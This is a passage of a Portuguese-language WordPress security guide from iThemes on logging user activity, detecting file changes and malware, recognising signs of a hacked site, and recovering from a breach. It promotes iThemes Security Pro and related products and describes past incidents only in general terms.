O primeiro tipo de atividade do usuário registrado é quando os usuários fazem login e logout do seu site e de onde. Monitorar a hora e a localização dos logins do usuário pode ajudá-lo a identificar um usuário comprometido. Esse usuário fez o login em um momento incomum ou em um novo lugar? Nesse caso, você pode iniciar sua investigação com eles.

2. Criação / registro de usuário

A próxima atividade da qual você deve manter um registro é a criação de usuários, especialmente a criação de usuários Administradores. Se um hacker puder comprometer um usuário legítimo, ele pode criar seu próprio usuário administrador na tentativa de se disfarçar. É fácil notar algo estranho em sua conta, mas é muito mais difícil identificar atividades maliciosas em outro usuário.

Monitorar o registro do usuário também é essencial. Algumas vulnerabilidades permitem que os hackers alterem a nova função de usuário padrão de Assinante para Administrador.

Se você tiver o registro do usuário configurado apenas para monitorar a atividade dos usuários administradores, apenas o registro do novo usuário administrador será registrado nos registros de segurança. Portanto, se você vir um usuário recém-registrado em seus logs de segurança, algo deu errado.

3. Adicionando e removendo plug-ins

É vital fazer um registro de quem adiciona e remove plug-ins. Depois que seu site for hackeado, será fácil para o invasor adicionar seu plug-in personalizado para injetar código malicioso no site.

Mesmo que um hacker não tenha acesso ao seu servidor ou banco de dados, ele ainda pode fazer alterações no painel do WordPress. Usando um plug-in, eles podem adicionar redirecionamentos ao seu site para usar na próxima campanha de spamvertizement ou injetar malware em seu banco de dados. Depois que seu código malicioso é executado, eles podem excluir o plug-in para remover as evidências de seu crime. Para nossa sorte, não perderemos nada disso porque tudo foi documentado em nossos registros de segurança do WordPress.

4. Alternando Temas

Outra atividade do usuário monitorada pelo registro de usuário do iThemes Security Pro é quando alguém muda o tema do site. Se você descobrir que seu tema mudou inesperadamente, você pode consultar seus registros de segurança do WordPress para descobrir quem fez a alteração.

5. Mudanças em postagens e páginas

Finalmente, você deseja monitorar todas as alterações em sua postagem e páginas. Algum link foi adicionado para enviar seu tráfego para outros sites? Monitorar postagens e páginas pode ajudá-lo a encontrar quaisquer páginas embaraçosas ou links maliciosos adicionados ao seu site após uma violação.

Para descobrir qual postagem foi modificada, clique nos links Visualizar detalhes para encontrar o ID da postagem.

Confira a postagem em destaque sobre o recurso Log do usuário para saber mais sobre como monitorar a atividade do usuário pode ajudá-lo a voltar de um hack.

Empacotando

O registro insuficiente é um dos 10 principais riscos à segurança de aplicativos da web do OWASP. O monitoramento do comportamento correto o ajudará a identificar e interromper ataques, detectar uma violação e acessar e reparar os danos causados ​​ao seu site após um ataque bem-sucedido.

Seção 10: Quando ocorre um desastre de segurança do WordPress

Mesmo se você seguir as práticas recomendadas de segurança do WordPress, ainda há uma chance de seu site ser comprometido. Um comprometimento significa que um hacker violou seu site e o infectou com malware.

O que é uma violação de segurança?

Uma violação de segurança ocorre quando um cibercriminoso consegue obter acesso não autorizado ao seu site ou servidor. As violações de segurança podem acontecer de muitas maneiras diferentes, à medida que os hackers exploram alguns dos problemas de segurança mais comuns do WordPress. Desde a execução de versões desatualizadas de plug-ins e temas até injeções de SQL mais complicadas, uma violação de segurança pode acontecer até mesmo aos proprietários de sites mais vigilantes.

Hora de detectar uma violação de segurança: um fator-chave na limpeza de um site infectado

Você sabia que o tempo médio necessário para descobrir uma violação de um site é de 200 dias? Infelizmente, quanto mais tempo você leva para perceber uma violação, mais danos um hacker pode causar ao seu site, aos seus clientes e a você. Um malware pode causar uma quantidade impressionante de danos em 200 dias. É por isso que é tão importante reduzir o tempo que leva para detectar uma violação de segurança.

Porque? A limpeza e o tempo de inatividade de que você precisará para limpar seu site após 200 dias de danos também são impressionantes. O tempo para investigar tudo o que o malware tocou e quais dados do cliente foram roubados só aumenta enquanto a violação permanece não detectada. Sem falar no tempo que você terá de gastar informando os clientes de que eles precisam cancelar seus cartões de crédito porque um hacker registrou todas as teclas digitadas enquanto visitava seu site.

O custo de ser hackeado é alto. Você tem que pagar a alguém para investigar a violação e limpar seu site. O especialista em reparos de hack terá que desativar o seu site enquanto eles trabalham, e as pessoas não poderão fazer novas compras enquanto o seu site estiver inativo. Depois de perder a confiança do cliente, você provavelmente perderá todas as compras futuras que ele teria feito.

O custo de um hack é o motivo pelo qual é crucial notar uma violação o mais rápido possível. Quanto mais rápido você descobrir a violação, mais rápido poderá impedir qualquer dano futuro e mais rápido poderá colocar seu site e sua empresa online novamente.

Os scanners de malware são suficientes?

Os verificadores de malware fornecem uma maneira de verificar seu site do WordPress em busca de arquivos e scripts maliciosos conhecidos. Mas os scanners de malware são suficientes para detectar uma violação de segurança?

Em uma palavra, não. Não pense que você pode confiar apenas em um scanner de malware para verificar se o seu site está infectado. Nenhum scanner de malware pode identificar cada peça de malware que existe. Se você encontrar um scanner de malware que afirma ser 100% preciso, execute porque varreduras que fazem afirmações como essa costumam ser as menos precisas que existem.

Detecção de Malware Comportamental vs. Assinatura

A maioria das varreduras de malware e software antivírus usa assinaturas de malware para detectar malware. As verificações de malware mais avançadas usarão uma combinação de detecção de assinatura e análise comportamental.

Assinaturas de malware

Uma assinatura de malware é uma série de bytes usados ​​para identificar partes conhecidas de malware. Alguns scanners de malware são alimentados por um banco de dados preenchido com as assinaturas de malware de milhões de vírus conhecidos.

A verificação de malware baseada em assinatura é rápida, simples e detecta 100% das partes conhecidas e bem compreendidas de malware. Tudo isso é ótimo e detectará malware adicionado por hackers de baixo nível.

No entanto, hackers habilidosos sabem que os scanners de malware verificam assinaturas de malware conhecido. Esses hackers têm a capacidade de ofuscar assinaturas de malware para não serem detectados por seu scanner comum.

Novo malware é lançado a uma taxa que os verificadores de malware não conseguem manter seu banco de dados atualizado com todas as assinaturas mais recentes. Portanto, um scanner baseado em assinatura não será capaz de dizer a diferença entre um novo bit de malware e o arquivo readme.txt de um plugin.

Análise Comportamental

A análise comportamental verifica as ações de um software para determinar se ele é malicioso. Existem vários tipos de comportamento que podem ser considerados suspeitos ou maliciosos. Por exemplo, o iThemes Security Pro Site Scan aproveita a API de navegação segura do Google para ajudar a manter os sites seguros. A Navegação segura do Google verificará se uma parte do software está redirecionando o tráfego para um site malicioso conhecido.

Novamente, não existe um método infalível de detecção de malware. Mas uma combinação de verificações comportamentais e de assinatura aumentará significativamente suas chances de ser alertado sobre evidências de uma violação de segurança.

Qual comportamento é compartilhado por todos os malwares?

Sabemos como é crucial detectar uma violação de segurança o mais rápido possível e que confiar apenas na detecção de malware não é suficiente. Então, nós nos perguntamos como o iThemes Security Pro poderia reduzir o tempo que leva para as pessoas detectarem violações de segurança em seus sites.

Embora o tipo de dano que o malware causa em seu site varie muito, o que ele faz pode ser resumido a uma ou a uma combinação das três coisas a seguir.

1. Adicionar arquivos - o malware na forma de spyware pode adicionar um arquivo malicioso que registrará as teclas digitadas pelo cliente à medida que ele digita as informações do cartão de crédito.
2. Remover arquivos - Alguns malwares irão remover um arquivo legítimo e substituí-lo por um arquivo malicioso com o mesmo nome.
3. Modificar arquivos - o malware tentará ocultar seu código malicioso ocultando-o em um arquivo existente que ele modifica.

Não seria bom ser alertado sobre mudanças inesperadas em seu site para que você possa inspecioná-lo em busca de sinais de violação de segurança?

Como reduzir o tempo necessário para detectar uma violação de segurança

A chave para detectar rapidamente uma violação de segurança é monitorar as alterações de arquivos em seu site.

O recurso Detecção de alteração de arquivo no iThemes Security Pro examinará os arquivos do seu site e alertá-lo-á quando ocorrerem alterações no seu site.

Existem vários motivos legítimos para ver novas atividades de alteração de arquivo em seus logs, mas se as alterações feitas foram inesperadas, você deve reservar um tempo para garantir que as alterações não foram maliciosas. Por exemplo, se você vir uma alteração feita em um plug-in na mesma data e hora em que atualizou o plug-in, não há razão para investigar.

Como ativar a detecção de alteração de arquivo no iThemes Security Pro

Para começar a monitorar as alterações do arquivo, ative a Detecção de alteração do arquivo na página principal das configurações de segurança.

Assim que a Detecção de alteração de arquivo estiver ativada, o iThemes Security Pro começará a verificar todos os arquivos do seu site em blocos . A varredura de seus arquivos em blocos ajudará a reduzir os recursos necessários para monitorar as alterações nos arquivos.

A verificação de alteração de arquivo inicial criará um índice dos arquivos do seu site e seus hashes de arquivo. Um hash de arquivo é uma versão abreviada e não humana legível do conteúdo do arquivo.

Após a conclusão da varredura inicial, o iThemes Security Pro continuará a examinar seu arquivo em partes. Se um hash de arquivo for alterado em uma das varreduras subsequentes, isso significa que o conteúdo do arquivo foi alterado.

Você também pode executar uma alteração manual de arquivo clicando no botão Verificar arquivos agora nas configurações de Detecção de alteração de arquivo

Ativando e-mails de notificação de alteração de arquivo

Mudanças em arquivos acontecem o tempo todo, e receber um alerta por e-mail para cada mudança se tornaria rapidamente uma tarefa difícil. E antes que você perceba, torna-se um menino chorando situação de lobo, e você começa a ignorar os alertas de mudança de arquivo por completo.

Vamos dar uma olhada em como o iThemes Security Pro identifica de forma inteligente as alterações legítimas para reduzir as notificações e como você pode silenciar as notificações para arquivos que devem ser atualizados com frequência.

Você pode gerenciar todas as suas notificações de segurança do iThemes a partir da Central de Notificações dentro do plugin de segurança do iThemes. No painel de administração do WordPress, visite Segurança> Configurações e localize o módulo Central de Notificações .

Como o iThemes Security Pro identifica alterações legítimas em arquivos

Existem algumas maneiras pelas quais o iThemes Security Pro pode detectar se uma alteração feita em um arquivo era legítima e não um motivo de preocupação. O iThemes Security Pro não criará uma notificação de Alteração de Arquivo para as alterações que ele pode verificar.

1. Atualizações de plug-in / tema concluídas pelo gerenciamento de versão

O recurso de gerenciamento de versão no iThemes Security Pro permite que você atualize automaticamente o WordPress, plug-ins e temas.

Se uma atualização for concluída pelo Gerenciamento de versão, o iThemes Security Pro saberá a fonte da atualização e não acionará um alerta.

2. Comparação de arquivos para plug-ins e temas do iThemes

Marque a caixa Compare Files Online nas configurações File Change Detection para habilitar a comparação de arquivos online.

Sempre que um arquivo em seu site pertencente a um plugin ou tema do iThemes for alterado, ele será comparado a um arquivo no servidor do iThemes. Se o hash da versão do arquivo em seu site corresponder ao hash da versão no servidor iThemes, será uma alteração legítima e você não receberá um alerta.

3. Comparação de arquivos online do WordPress.org

Se um arquivo principal do WordPress ou um plugin instalado do repositório do WordPress.org for alterado, o arquivo será comparado com a versão no WordPress.org. Se os hashes corresponderem, as alterações não são maliciosas e você não receberá um alerta.

4. Exclusões manuais

Você pode excluir arquivos, diretórios e tipos de arquivo da Detecção de alteração de arquivo nas configurações de Detecção de alteração de arquivo.

A regra geral é que não há problema em excluir arquivos que você sabe que serão atualizados regularmente. Os arquivos de backup e cache são um exemplo perfeito disso. A exclusão desses tipos de arquivos acalma muito o ruído extra.

7 sinais de que seu site WordPress foi hackeado

Você está se perguntando: “ Meu site WordPress foi hackeado? ”Significa que você vai querer algumas respostas rápidas.

Quanto mais rápido você notar os sinais de violação de um site, mais rápido poderá limpar o seu site. Quanto mais rápido você limpar o seu site, menos danos o hack poderá causar ao seu site.

1. Sua página inicial é diferente

Mudanças em sua página inicial parecem um sinal óbvio. Mas quantas vezes você realmente faz uma verificação completa em sua página inicial? Eu sei que normalmente vou direto para o meu URL de login e não para o meu URL inicial. A partir daí, eu faço o login, atualizo meu site ou edito uma postagem. Depois que termino o que vim fazer, geralmente saio sem olhar a página inicial do meu site.

O objetivo principal de alguns hacks é roubar um site ou ganhar notoriedade. Então, eles apenas mudam sua página inicial para algo que eles acham engraçado ou para deixar um cartão de visita hackeado .

Se notar uma mudança em sua página inicial, você pode restaurar seu site de forma rápida e fácil usando um arquivo de backup feito com um plug-in de backup WordPress confiável, como BackupBuddy.

2. O desempenho do seu site caiu

Seu site pode ficar lento quando há uma infecção. Você pode experimentar lentidão em seu site se estiver enfrentando ataques de força bruta ou se houver um script malicioso usando os recursos do servidor para mineração de criptomoeda. Da mesma forma, um DDoS (ou ataque de negação de serviço ) ocorre quando uma rede de IPs envia simultaneamente solicitações para o seu site na tentativa de travá-lo.

3. Seu site contém anúncios pop-up maliciosos ou de spam

Há uma boa chance de um hacker ter comprometido seu site se os visitantes virem pop-ups que os redirecionam para um site malicioso. O objetivo desse tipo de ataque é direcionar o tráfego do seu site para o site do invasor, para que eles possam direcionar os usuários com fraude de cliques para publicidade paga por clique.

O mais frustrante sobre esse tipo de hack é que você pode não conseguir ver os pop-ups. Um hack pop-up pode ser projetado para não ser exibido para usuários conectados, o que diminui as chances de os proprietários de sites os verem. Portanto, mesmo quando o proprietário do site efetua logout, os pop-ups nunca serão exibidos.

Sua visualização dos pop-ups também pode ser limitada se você usar uma extensão de bloqueador de anúncios em seu navegador. Por exemplo, um cliente relatou um hack de pop-up e compartilhou capturas de tela e um vídeo dos pop-ups. Depois de passar horas examinando o site deles, não consegui recriar nada do que eles estavam relatando. Eu estava convencido de que seu computador pessoal havia sido hackeado e não o site.

Finalmente, percebi por que não conseguia ver os pop-ups. Eu instalei uma extensão adblocker no meu navegador. Assim que desativei a extensão do bloqueador de anúncios, consegui ver pop-ups em todos os lugares. Eu compartilho esta história embaraçosa para salvá-lo de cair no mesmo erro, espero.

4. Você nota uma diminuição no tráfego do site

Se você entrar em sua conta do Google Analytics e notar uma queda acentuada no tráfego do site, seu site WordPress pode ser hackeado. Uma queda no tráfego do site merece uma investigação. Pode haver um script malicioso em seu site que está redirecionando os visitantes para fora do seu site, ou o Google já pode estar colocando seu site na lista negra como um site malicioso.

A primeira coisa que você deve procurar é o tráfego de saída do seu site. Ao rastrear seu site com o Google Analytics, você precisará configurá-lo para rastrear o tráfego que sai de seu site. A maneira mais fácil de monitorar o tráfego de saída em seu site WordPress é usar um plugin do Google Analytics para WordPress.

6. Novos usuários inesperados

Se o seu site tiver registros inesperados de novos usuários administradores, esse é outro sinal de que o seu site WordPress foi hackeado. Por meio de uma exploração de um usuário comprometido, um invasor pode criar um novo usuário administrador. Com seus novos privilégios de administrador, o hacker está pronto para causar grandes danos ao seu site.

Lembra do plugin de conformidade WP GDPR anterior? Em novembro de 2018, recebemos vários relatos de novos usuários administradores criados em sites de clientes. Os hackers usaram uma vulnerabilidade no plugin WP GDPR Compliance (vulnerabilidade corrigida na versão 1.4.3) para criar novos usuários admin em sites WordPress executando o plugin. A exploração do plug-in permitiu que usuários não autorizados modificassem o registro do usuário para alterar a função padrão de novo usuário de assinante para administrador. Infelizmente, essa não foi a única vulnerabilidade e você não pode simplesmente remover os novos usuários que o invasor criou e corrigir o plug-in.

Se você tinha WP GDPR Compliance e WooCommerce instalados, seu site pode ter sido injetado com um código malicioso. Os invasores podem usar o instalador em segundo plano do plug-in WooCommerce para inserir um instalador backdoor no banco de dados. Se o seu site tiver um backdoor instalado, você deve entrar em contato com um especialista em reparos de hack. Outra opção é usar um arquivo de backup para reverter para uma cópia do seu site antes da violação usando um backup anterior.

7. Usuários Admin removidos

Se você não conseguir entrar no seu site WordPress, mesmo após uma redefinição de senha, pode ser um sinal sério de infecção.

Quando o repositório Gentoo Github foi hackeado, a primeira coisa que o atacante fez foi deletar todos os usuários administradores. Então, como esse hacker conseguiu entrar na conta do Github? A senha de um usuário administrador do Gentoo foi descoberta em um site diferente. Estou supondo que o nome de usuário e a senha foram descobertos por meio de raspagem ou despejo de banco de dados.

Mesmo que a senha do administrador para sua conta Gentoo Github fosse diferente daquela usada na conta comprometida, era muito semelhante. Então, seria como se eu usasse iAmAwesome2020 como senha em uma conta e iAmAwesome2021 em outro site. Assim, os hackers conseguiram descobrir a senha com um pouco de esforço. Como podemos ver, você deve usar uma senha única para cada conta. Uma simples variação em suas senhas não é suficiente. Usando o LastPass, você pode gerar e armazenar com segurança senhas fortes e exclusivas para cada site.

Como voltar do desastre

Se você suspeitar que uma violação aconteceu, existem algumas etapas rápidas que você pode seguir para mitigar o dano.

Restaurar para um backup anterior / limpo do seu site

A maneira mais segura de desfazer uma violação de segurança é restaurar seu site para uma versão anterior, antes do ataque. É por isso que ter uma solução de backup WordPress abrangente em vigor é tão importante. Recomendamos o uso de BackupBuddy para agendar backups para serem executados automaticamente para que você sempre tenha um backup.

Observe que restaurar um backup anterior ainda pode deixar seu site vulnerável à mesma violação, portanto, é importante seguir também estas etapas.

Atualize todos os plug-ins e temas desatualizados imediatamente

Um plug-in ou tema vulnerável ainda pode ser o culpado, por isso é importante atualizar IMEDIATAMENTE todos os plug-ins ou temas desatualizados. Mesmo se você restaurar para uma versão limpa anterior do seu site, as mesmas vulnerabilidades ainda existirão e podem ser hackeadas novamente.

Você também pode querer verificar se não está executando um plugin ou tema vulnerável que ainda não tenha um patch do desenvolvedor. Você precisará remover este plugin imediatamente.

Habilitar autenticação de dois fatores

Se você não estiver usando a autenticação de dois fatores para proteger os logins de administrador, ative-a imediatamente. Esta camada adicional de segurança ajudará a garantir que usuários não autorizados não possam hackear nenhuma conta de administrador.

Procure ajuda para remoção profissional de malware

As violações de segurança do WordPress ocorrem no nível do servidor (mais profundas do que a instalação do WordPress), então você pode precisar entrar em contato com um serviço profissional de remoção de malware. Recomendamos WeWatchYourWebsite para remoção de malware profissional.

Resumindo: Guia final de segurança do WordPress

Neste guia de segurança do WordPress, cobrimos MUITO! Mas, seguindo as dicas deste guia, você bloqueará quase 100% dos ataques lançados em seu site.

Um plug-in de segurança do WordPress pode ajudar a proteger seu site do WordPress

Combinado com o conhecimento dos tópicos de segurança do WordPress neste guia, um plug-in de segurança do WordPress pode ajudar a proteger seu site do WordPress. O iThemes Security Pro, nosso plugin de segurança para WordPress, oferece mais de 50 maneiras de proteger e proteger seu site de vulnerabilidades comuns de segurança do WordPress. Com o WordPress, autenticação de dois fatores, proteção de força bruta, aplicação de senha forte e muito mais, você pode adicionar uma camada extra de segurança ao seu site.

Michael Moore

A cada semana, Michael elabora o Relatório de vulnerabilidade do WordPress para ajudar a manter seus sites seguros. Como Gerente de Produto da iThemes, ele nos ajuda a continuar melhorando a linha de produtos da iThemes. Ele é um nerd gigante e adora aprender sobre todas as coisas de tecnologia, antigas e novas. Você pode encontrar Michael saindo com sua esposa e filha, lendo ou ouvindo música quando não está trabalhando.